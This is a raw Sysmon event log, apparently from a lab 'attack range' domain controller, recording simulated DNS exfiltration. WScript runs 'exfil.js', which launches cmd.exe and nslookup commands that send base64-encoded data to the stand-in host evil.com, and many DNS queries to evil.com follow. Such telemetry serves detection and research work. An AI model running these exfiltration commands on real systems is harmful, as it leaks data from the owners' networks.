14:16:27.706{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199376Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.706{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17BB-629A-0740-000000005F02}3168C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000199375Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.706{2E1864BB-17BB-629A-0540-000000005F02}60006716C:\Windows\system32\cmd.exe{2E1864BB-17BB-629A-0740-000000005F02}3168C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000199374Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.709{2E1864BB-17BB-629A-0740-000000005F02}3168C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A QWNjVHlwZTogNTEy evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17BB-629A-0540-000000005F02}6000C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A QWNjVHlwZTogNTEy evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlkdsl.tmp 2>&1 22542200x8000000000000000199373Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.764{00000000-0000-0000-0000-000000000000}8104evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000199372Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.649{00000000-0000-0000-0000-000000000000}2252evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000199371Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.482{00000000-0000-0000-0000-000000000000}5112evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000199370Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.360{00000000-0000-0000-0000-000000000000}968evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000199369Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.274{00000000-0000-0000-0000-000000000000}3336evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000199368Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.200{00000000-0000-0000-0000-000000000000}6180evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000199367Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.138{00000000-0000-0000-0000-000000000000}2872evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000199366Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.063{00000000-0000-0000-0000-000000000000}2620evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000199365Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.987{00000000-0000-0000-0000-000000000000}5764evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000199364Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.906{00000000-0000-0000-0000-000000000000}1188evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000199363Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.834{00000000-0000-0000-0000-000000000000}7556evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000199362Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.763{00000000-0000-0000-0000-000000000000}1692evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000199361Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.696{00000000-0000-0000-0000-000000000000}3504evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000199360Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.612{00000000-0000-0000-0000-000000000000}5696evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000199359Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.533{00000000-0000-0000-0000-000000000000}4996evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000199358Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.192{00000000-0000-0000-0000-000000000000}6020evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000199357Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.076{00000000-0000-0000-0000-000000000000}7744evil.com0::ffff:127.0.0.1;<unknown process> 10341000x8000000000000000199356Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.685{2E1864BB-E13E-6299-1000-000000005F02}3643436C:\Windows\system32\svchost.exe{2E1864BB-17BB-629A-0640-000000005F02}7860C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199355Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.685{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17BB-629A-0640-000000005F02}7860C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199354Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.685{2E1864BB-17BB-629A-0640-000000005F02}78606372C:\Windows\system32\conhost.exe{2E1864BB-17BB-629A-0540-000000005F02}6000C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199353Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.669{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17BB-629A-0640-000000005F02}7860C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000199352Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.669{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199351Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.669{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199350Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.669{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199349Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.669{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199348Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.669{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17BB-629A-0540-000000005F02}6000C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000199347Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.669{2E1864BB-17A1-629A-783D-000000005F02}55526616C:\Windows\System32\WScript.exe{2E1864BB-17BB-629A-0540-000000005F02}6000C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000199346Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.676{2E1864BB-17BB-629A-0540-000000005F02}6000C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A QWNjVHlwZTogNTEy evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlkdsl.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 10341000x8000000000000000199345Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.653{2E1864BB-E13C-6299-0B00-000000005F02}6364072C:\Windows\system32\lsass.exe{2E1864BB-1722-629A-AA38-000000005F02}7028C:\Windows\system32\wbem\wmiprvse.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199344Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.653{2E1864BB-E13C-6299-0B00-000000005F02}6364072C:\Windows\system32\lsass.exe{2E1864BB-1722-629A-AA38-000000005F02}7028C:\Windows\system32\wbem\wmiprvse.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000199343Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.653{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlehywi.tmpMD5=05BA971AFDC62533F0A9B0611710936B,SHA256=CC7F6EF6FDFF1D48F32CBB164D99D5681824740D7C263CA1F614A2D5F388A371,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000199342Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.638{2E1864BB-17BB-629A-0340-000000005F02}79761152C:\Windows\system32\conhost.exe{2E1864BB-17BB-629A-0440-000000005F02}4540C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199341Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.638{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199340Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.638{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199339Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.638{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199338Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.638{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199337Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.638{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17BB-629A-0440-000000005F02}4540C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000199336Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.638{2E1864BB-17BB-629A-0240-000000005F02}36364036C:\Windows\system32\cmd.exe{2E1864BB-17BB-629A-0440-000000005F02}4540C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000199335Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.645{2E1864BB-17BB-629A-0440-000000005F02}4540C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17BB-629A-0240-000000005F02}3636C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlehywi.tmp 2>&1 10341000x8000000000000000199334Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.622{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-17BB-629A-0340-000000005F02}7976C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199333Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 